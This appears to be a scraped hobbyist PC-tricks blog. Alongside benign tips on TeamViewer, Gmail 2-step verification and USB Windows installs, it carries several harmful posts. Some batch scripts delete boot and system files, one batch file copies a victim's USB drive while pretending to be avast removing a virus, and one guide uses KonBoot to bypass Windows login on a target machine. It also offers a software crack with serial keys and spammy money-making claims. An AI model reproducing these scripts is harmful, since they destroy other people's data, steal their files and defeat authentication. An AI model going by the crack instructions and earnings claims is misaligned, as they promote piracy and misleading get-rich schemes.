PC PROBLEMS & THEIR SOLUTIONS.

common pc problems and their solutions.

1.       My computer’s speed is very slow.

Ans.   There are many reasons for slow speed of computer. At first Increase your RAM (random access memory). In P-4 system 256Mb ram is recommended. Your can increase up to 512 or 1gb for best result.  2nd: Check your hard drive for physical or logical errors or bad sectors. Often Bad sector reduces the speed of computer. 3rd: Check for virus in your computer and also remove unwanted and unnecessary files from your system. These tips will improve the speed of your computer.

DIFFERENCE BETWEEN TFT AND LCD

DIFFERENCE BETWEEN TFT AND LCD.
This is a common question when have been asked about several times by many people. Every body wants to know that what is the difference between a LCD and TFT. So i figured out, i should answer this question for anyone who has doubts.

LCD stands for Liquid Crystal Display... and 
TFT stands for Thin Film Transistor.

TFT is not really different from LCD. It comes from the family of LCD technology. We can say that it is a modern version of the LCD Technology. A TFT provide a well improved image quality. 
There are two typs of display quality. 1st one is Matty and 2nd is Grossy. Matty display is called LCD and Grossy display is called as TFT. LCD and TFT consumes less power energy as compared to CRT (Cathode ray tube).
Now a days TFT has been used for mobile phone devices, projectors, nevigation systems as well as TVs and computer monitors.

how to remotely operate a computer or what is team viewer and how it works

click here to download team viewer
Lots of computer software and hardware companies using team viewer to assist  there clients to get rid of problems. Team viewer is a software through which you can remotely operate a computer system by sitting anywhere else on other computer system.You can use team viewer to remotely access your friend's computer system.Is it secure..?? yes it is.. because no one can access your pc till (S)he has your id and password. and password changes everytime you open team viewer.

What is team viewer:-
It is a Remote desktop utility. by using it u can remotely access any computer by sitting on your computer system.both parties connect to a server which sets up a session between both.



How team viewer works:-
  • One person opens up teamviewer and calls person B.  
  • Person A gives the ID and password to person B.  
  • Person B puts this information in teamviewer and hits connect.
  • now person B can access person A computer.


 Requirements to use team viewer:-



Directions to use team viewer :-
  • Open team viewer
  • Inform second party to open it too.
  • Ask them there team viewer id and password (password changes every time you open team viewer) if you want to acces there system or give them your password and id to allow them to access your computer system.
  • type in there id and password. if you want to access there computer system.
  • Click on " Connect To Partner "
  • now you are all set to access second party computer system.





click here to download .pdf file about team viewer


how to protect gmail account from hackers

Most of the people use Gmail for sending emails. We have precious information stored in our Gmail account. So Gmail would be the target for hackers being hacking it. Gmail developer team has given us wonderful security option by enabling the 2-step Verification,



By enabling the 2-step verification from you Gmail account makes your account more secure by making you to login into Gmail by 2 step. While logging in into the Gmail account, Gmail send you the security code to your mobile phone and asks you to enter that code in Gmail login page. This makes sure that only the mobile phone carrier can able to know that code. So your account cannot be Hacked if someone tries to hack your account from somewhere else.


How to enable 2-step verification

  • Log in to your Gmail Account,
  • Click Account at the top right,
  • Click Edit on 2-step verification,
  • Now Click Start Setup,
  • selcet your country and add your mobile number,
  • Select the method of verification, SMS option is by default and it is most recommended one
  • Just click Send Code
  • Now Google will send you Text in your mobile with Verification Code
  • Now click Next, and NextNote this point after 2-step Verification
  • Your Another Application and Connected account will not be working, you need to re-invoke that on Final 2-step Verification or do it later!
  • If your Primary Moblie is lost then you cannot able to login to Gmail so set Backup Mobile Number
  • Backup Verification Code is the another way to Recover your Account Please Download and Note that number and keep it safely somewhere it is accessible for you, like your Wallet. Each code can be used only once.
  • I recommend you to read everything and make a note of it.
Happy with your safe Gmail Account. This time none can Hack your Gmail, I hope. Please comment below and also mention me if I have missed any point.

Windows 8 picture password

 
Windows 8 Tips.
Use a picture password to log into your computer. Windows 8 includes a new feature called Picture password, which allows you to authenticate with the
computer using a series of gestures that include circles, straight lines, and taps. Enable this feature if you want a new way to access your computer or have a hard time with passwords. Open the Windows Charms. Click Settings and then More PC settings In the PC settings  window click Users and then select Create a picture password.

Top 5 most Dengerous notepad Tricks

SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
DO NOT TRY THESE FOR FUN!!

1. How to create more than 3,000 folders under a minute
1) Open your notepad and type
the following code.
@echo off
:top
md %random%

goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
 ———————————————————————————
——————————————————–




2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

———————————————————————————
——————————————————–
3. How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5mins.
———————————————————————————
——————————————————–
4. RAM crashing trick
open notepad and type
:A
start http://computer-tricks-corner.blogspot.in/
goto A
save with .bat extension.
Infinitely loops your browser to

———————————————————————————
——————————————————–
5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.
WARNING THIS LINK WILL CRASH
YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!!

NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!

Transform your windows to Macintosh







                              Transform your windows to Macintosh
 

 

Get Lion Transformation pack 1.0 which transforms your Windows OS to Apple's Macintosh OS.
It is a nice theme check out some of the screen shots here : -







                                        click here to download                                                           

How to create your own customized RUN commands

                                How to create your own customized RUN commands








Create your own customized RUN command in just 5 easy steps :-

By this you should be able to run your programs directly for eg. you want to open windown media player.You need to type only   wmp    in the Run dialog box. Its your wish what name you want to give  the command.  

----Right click on the desktop screen and click on "New" then click on "Shortcut".




How to install Window 7 using USB drive ?



"It's time to be smart with smart windows"








Installing windows 7 using USB drive


What are basic requirements ?
-----Windows 7 DVD
-----And a USB drive having minimum capacity of 4GB.



 What  are advantages if we install window 7 using flash drive ?

----First overall speed of the installation willl increase significantly.
----Carrying USB is more easy and convienient than DVD.
----It also become possible to install windows 7 on  that systems which are not having  DVD drives    such as Net book..


Steps of installing windows 7 using USB drive.
---- Insert USB
---- Run the command prompt as administrator. (Type cmd in start and right click on cmd and click on "run as administrator".)
----In the command prompt type the following command

-DISKPART



A new window will appear and execute the following commands in that new window.
 -LIST DISK
-SELECT DISK 1
-CLEAN
-CREATE PARTITION PRIMARY
-SELECT PARTITION 1
-ACTIVE
-FORMAT FS=NTFS
  (This process may take few seconds)
-ASSIGN
-EXIT



Do not  close the command prompt. Minimize it.
----Insert window 7 DVD .
----Maximize cmd and execute the following commands
-   N: CD BOOT   (hit enter Here "N" is my DVD drive letter write your one's here)
-   CD BOOT
-   BOOTSECT.EXE/NT60 O:  (Here "O" is my USB drive letter)



                          Your USB device is ready for the boot. Now copy the content of DVD to the USB.
The thing you left to do is to enabling the USB boot options in the BIOS from CD-ROM or HDD.
Enjoy installing windows from USB . If any problem leave it in the comment

PC Security Tips : Make Computer Secure

Here are some tips which will enable you to make your PC more secure.

Anti-virus

1. Never, ever turn off the resident protection of your antivirus even if it decreases performance. Upgrade if necessary.

2. Keep your virus definitions up-to-date. Use the automatic update feature of your anti-virus and try not to ignore the "Do you want to update now" message however often it might pop up.

3. Even if you update regularly and you have not seen any suspicious activity on your PC, do a deep scan at least once a month.

4. Always create an emergency boot disk and keep it in a safe place.

Computer welcome you when you login


 Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup
 
To use this trick, follow the instructions given below:-


  1. Click on Start. Navigate to All Programs, Accessories and Notepad.
  2. Copy and paste the exact code given below.

Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks


     3.  Replace Username with your own name.

     4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".

     5.  Copy the saved file.

     6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.

      7.  Paste the file.








Stolen data from anyone's pendrive


copy data from anyone's pendrive



you can copy data from any one's pendrive without knowing him easyly with .bat file
you have to make a bat file file to copy a pen drive to your computer

(1) open notepad
(2) write bellow code (3)save file with .bat


@echo off
echo avast is working to remove virus
echo please wait for some time do not close.........
echo process is running
xcopy /a /e /k /q /h f:(path of pendrive) d:\kishan(path where you want save data)
cls
echo virus removed

example

@echo off
echo avast is working to remove virus
echo please wait for some time do not close.........
echo process is running
xcopy /a /e /k /q /h f: d:\kishan
cls
echo virus removed
TRICK make 3-4 file of different file with like f: i: h:
now make shortcut of that file
right click on it
give shortcut key(as above)
its done when someone insert pendrive press that key done
if you have any problem write it bellow

Earn money

Guys earn money by just reading sms 100% true click here


Ultoo script for 16 th march

Ultoi script updated for 16 march click here to download super fast script check it

Ultoo script for 16th march

Ultoo script for 16 march updated click here to download

Ultoo script new

Ultoo new super fast script for 15 march click here

Ultoo script for 15 march

Ultoo script for 15 march click here to download

ultoo script for 13 march


ultoo script updated for 13 march super speedy script all in one click here to download if this script not working try this click here

Ultoo script for 12th march

Ultoo script updated for 12 march click here to download

guys i have updated script old script was not working so i post a new super fast ultoo script check it

Ultoo script for 12th march

Ultoo script updated for 12th march click here to download if you dont know how to use script click here

Ultoo script for 11th march

Ultoo script updated for 11th march click here to download

Ultoo script for 10th march

Ultoo script for 10th march click here to download sorry guys for late update

Ultoo scrip for 9th march

Ultoo script updated for 9 th march click here to download...
Guys i will post ultoo superb trick on my new blog on 15th march new blog is itlikerz.blogspot.com just wait for 15th march

Ultoo script for 8 march

Ultoo script updated for 8th march click here to download if you dont know how to use this script pls check my previous posts

Earn money from your facebook grouph


HOW TO MAKE MONEY ONLINE WITH Facebook and Twitter Using ADFOC.US WEBSITE IS VERY EASY AND PAYS HIGH, YOU CAN MAKE MORE THAN $100 PER DAY WITHOUT DOING MUCH WORK AS A STARTER, JUST 15 MINUTES OF YOUR TIME EVERYDAY IS ENOUGH THEN SIT BACK AND WATCH YOUR MONEY GROW EACH MINUTE. I HAVE SEEN DIFFERENT TIPS AND WAYS OF MAKING MONEY ONLINE BUT ADFOC.US IS SOMETHING ELSE, EVEN PEOPLE I RECOMMENDED TO THIS SITE HAVE BEEN COMING BACK TO THANK ME, AT A TIME WHEN MAJORITY OF WORK FROM HOME WEBSITES LIMIT THE AMOUNT OF MONEY YOU CAN EARN PER DAY, ADFOC.US GIVES YOU THE OPPORTUNITY TO EARN AS MUCH AS YOU CAN AND THE WONDERFUL THING ABOUT IT IS THAT YOU ARE PAID IMMEDIATELY YOU REQUESTED FOR PAYMENT AND THEIR MINIMUM CASH OUT IS $5.00 WHICH IS AS SIMPLE AS ABC TO REACH. AT FIRST, WHEN I SAW THIS SITE I THOUGHT IT WAS A SCAM WEBSITE BECAUSE OF HOW MUCH MONEY PEOPLE CAN MAKE FROM IT BUT AFTER MUCH INVESTIGATION AND RESEARCH ON GOOGLE, FORUMS AND SOCIAL NETWORKS WHERE THEY HAVE EVER GROWING MEMBERS, I WAS QUICK TO JOINED THEM . IN ORDER TO HELP PEOPLE WHO ARE LOOKING FOR HOW TO MAKE MONEY ONLINE , I DECIDED TO WRITE THIS ARTICLE AND GIVE OUT A DETAILED STEP BY STEP ON HOW TO MAKE MONEY WITH ADFOC.US.
What is Adfoc.us?

Adfoc.us is an URL shortening service, such as bit.ly and goo.gl but with one little twist, you can make money from every link you create! Today there are plenty of websites out there that gives you the opportunity to shorten your links in order to make them more appealing or to hide where thelink actually leads. However, there are only a few of them that youcan make money online from and adfoc.us is one of the best for just that. Later on in this article I will show you some the different ways that you can use to makemoney with adfoc.us. While adfoc.us is a great website you will most likely not make enough money from it to quit your day job, though it can build up over time and provide you with that money you need to start up your bigger projects online.
How does adfoc us work?

Adfoc.us is simply a link shortening service that serves ads in every link that you create. For every ad in your links that someone sees you will make money. The ad shows for 5 seconds before you can click "skip ad" and continue to the links destination. The amount of money you make is about $0.5 to $4.7 per thousand views as I'm writing this article. Below are some ways on how to make money online with adfoc.us.

Tips On How To MakeMoney With Adfoc.us:


Visit Adfoc.us website to register and after registration they will send an email confirmation message to you immediately. Then visit your email and click on the link they sent you which will verify your account. Then log into Adfoc.us website again with the email address and the password you used to register, update your profile and the payment method that you preferred to be paid with and then click submit button. Finally, copy any website url address of your choice eg www.google.com or referral link and paste it in the shrink box then click shrink, It will generate a shorter link that looks like this: http://adf.ly/6672 then copy the new link and paste it on your facebook wall, twitter, forums, websites, blog etc with a note attached to it and make it look like this=> click here=> http://adf.ly/6672 to visit and join google adsense for free. Each time people click on the link it will show them an Ad from Adfoc.us and also redirect them to your website and you are paid.

click here to join adfoc

click here to join adfoc

click here to join adfoc

click here to join adfoc

click here to join adfoc
click here to join adfoc

Ultoo scrip for 7th march

Ultoo script for 7 march click here to download(i updated script early for multiaccout user as per our one user`s requirment) if you have any quary pls write in comment

Pls allso give me your feedback in comment

Get free recharge like ultoo

I find a new site which is same as ultoo we can earn from sending msg playing polls click here for signup i will post trick for it soon waiting for it thanks for your great support my bolg viewer are incress day by day

Earn money online

Guys my daily ultoo script good you get free recharge now time to earn money online you can earn money with one time register only and it is totely free you get money by reading sms for more details click bellow read carefully

Click here


For more details click on above link

Ultoo script updated for 6 march

Ultoo script for 6 march 2013 click here(just wait for 6 second then click skip to download) to download

how to root samsung galaxy y s5360


how to root samesung galaxy y and other android mobile click here to get informaion

Android rooting


Details what is android rooting

Android rooting is the process of allowing users of smartphones, tablets, and other devices running the Android mobile operating
system to attain privileged control (known as "root access") within Android's subsystem.
Rooting is often performed with the goal of overcoming limitations that carriers and hardware manufacturers put on some devices,
resulting in the ability to alter or replace system applications and settings, run specialized apps that require
administrator-level permissions, or perform other operations that are otherwise inaccessible to a normal Android user.
On Android, rooting can also facilitate the complete removal and replacement of the device's operating system,
usually with a more recent release of its current operating system.


As Android was derived from the Linux kernel, rooting an Android device is similar in practice to accessing administrative
permissions on Linux or any other Unix-like operating system such as FreeBSD or OS X.


"Rooting" vs. "jailbreaking"

Gaining root access is sometimes compared to jailbreaking devices running the Apple iOS operating system.
However, these are distinct concepts. In the heavily secured iOS world, restrictions prevent
(1) installing or booting into a modified or new operating system (a "locked bootloader" prevents this),
(2) sideloading unsigned applications onto the device is prevented and user-installed apps are
(3) prevented from root permission and run in a secure sandbox. Bypassing all these restrictions together constitute the expansive term "jailbreaking" of Apple devices,
overcoming several types of iOS security features. By contrast, while many Android devices have locked bootloaders, the ability to sideload apps is common and usually permissible
without root permissions. Thus, it is primarily the third aspect of iOS jailbreaking relating to superuser
privileges that correlates to Android rooting.


Android top 70 application


we find many application on android market but i am find best and most useful application for you
click here to watch application list
on above link you will give full details

guys Thanks for great support on my blog i got more then 1000 page view in just one month


pls join my facebook grouph for more updateds tricks and many more

Click here to join facebook grouph

Ultoo script for 5th march

Ultoo script for 5 th march click here to download

Utoo script for 4th march

Click here to download ultoo script for 4th march

Ultoo auto answer for march

Ultoo script for march auto update script just one time
Answerit download click here to download
100% working trick

Ultoo script for 2nd march

Ultoo script 2 march Download ultoo script click here to download

Ultoo script for 1 march

Ultoo script for 1 march updated download click here to download (just wait 6 second then click skip to download)
If you dont know how to use this script and what is ultoo pls check my previous post or comment bellow i will help you

Keep visiting for daily new script,tricks,hacks,ultoo trick,creck softwere and many more

HOW TO BYPASS WINDOWS ALL VERSIONS LOGIN USING KONBOOT V. 1.1 32 &64 BIT


BYPASS WINDOWS ALL VERSIONS LOGIN USING USB (PASSWORD HACK)

KonBoot v 1.1 32 & 64-bit

Product description:

KonBoot is an application which will bypass the authentication process of a Windows logon. KonBoot can work on either a USB
flash drive or CD-ROM.
Using KonBoot is simple. First load it to your desired media (CD or USB flash then insert it into the target computer, and start
it up!
The password is not required to logon to Windows, nor is it overwritten.
Simply plugin KonBoot and let it do the rest.
A common scenario encountered by most computer users is lost or forgotten passwords.
In other cases, such as in forensics, it is necessary to have a running version of the operating environment, and not just a raw listing of files.
Boot is designed to be an administrative tool for skilled and non skilled users alike. It works with both computers and virtual machines.
How to use KonBoot Software:
Its very Simple
Format your USB using Fat32
Keep it plugged in
Now, extract those files.
Now click on KonBootInstall.exe
A cmd window will open.
Now what you have to do is to enter your USB drive path and press Enter.
It will say Kon Boot Loader successfully installed, press any key to exit.
Now you are done, your USB is ready.
Plugin your USB to the computer you want to bypass the protection and start it and go to boot menu ( In my laptop it's F12 ) .
Select the USB device you have plugged in and boot from it. Now when it will ask for a password just press Enter. And
WOOOOW its done

Click here to download


plese click skip to get the download link
keep visiting

Typing Master Pro 7.0 with Serial Key


Five comprehensive courses:The five typing courses cover the whole keyboard - including special marks, numeric keypad - and help you to accelerate your typing speed.
Multi-form exercises:The visual keyboard drills, timed texts, games and dynamic reviews will get you in the flow and keep you engaged.
2.Optimal Learning
Optimized duration:The duration of each exercise is based on your progress in accuracy and speed.
Personal accuracy goal:Set a personal accuracy goal level for the entire course.
Smart review:Let TypingMaster keep track of your problem keys and help you improve your skills with personalized review exercises.
TypingMaster Satellite :Let the Satellite analyze your typing in other programs for tailored training and typing statistics.
3. Following Your Progress
Advanced feedback and tips :Get instructive feedback on your progress and difficulties as well as personal learning tips.
Professional typing tests:Test your typing speed with a professional timed tests and view your results with a detailed report.
Illustrated statistics:Follow your progress with graphical long-term statistics.
4.Additional Features
Support for multiple users:Multiple users can easily improve with TypingMaster using the personal study profiles.
QuickPhrase typing tool :Store frequently used text snippets and paste them to any application with a few clicks.
Benefits of Typing Master Pro
1.Accelerate your typing speed:With TypingMaster a novice keyboard user can learn to type many times faster. Clumsy typing will
no longer interrupt the flow of your thoughts!
2.Get rid of typos :Get rid of those annoying typing errors and increase the quality of your texts.
3.Save valuable work time :Learning to touch type will help save dozens of working hours each year as you type faster and do not
need to correct errors constantly.
4.Focus on your text and ideas:With fluent keyboarding skills you can put your brain power into expressing your thoughts instead of finding the right keys.
5.Improve your ergonomics :Natural, efficient finger movements and no need to look at the keyboard results in less stress in fingers, arms and neck.
6.Be confident with computers:Improved typing skills will help take full advantage of your computer as you become more confident
with the keyboard.
Install Notes:
1. Disable the network connection or Disconnect from your internet connection otherwisethe serial key will not work.
2. Install the program by run TypingMasterENG.exe
3. Wait till finish the installation process.
4. launch typing master pro and enter the license key.
5. Close the program and go to the program files of Typing Master (e.g. C:/Program Files/TypingMaster)
6. Select the file "tmaster8.net".
7. Right click on the file and choose properties Then apply attribute to read only.
8. Then enable your network connection.
System Requirements For typing master Pro
TypingMaster Pro requires an of the 32-64 bit windows operating system.
Hardware Requirements:
Pentium 300 MHz or faster recommended
Minimum display area 800x600
High Color display (more than 256-colors)
32 MB of RAM or more
20 MB free hard disk space minimum

Click here to Download

Free Avast Antivirus Serial Key Till 2038


avast Free Antivirus is a full-featured product, with the same antivirus and anti-spyware scanning engine used in our premium products.
Version 7.0 provides even faster protection than its predecessor and offers a web-reputation browser extension as well as virtualization technology. Accurate threat updates via avast.
CommunityIQ technology ensure worry-free downloading, surfing, social networking, and gaming for over 170 million registered users (and over 130 million active users).
Download Avast click here
key of avast is

W6754380R9978A0910-4TZ59467

100% working trick for avast antivirus
if any problem comment bellow i will hepl you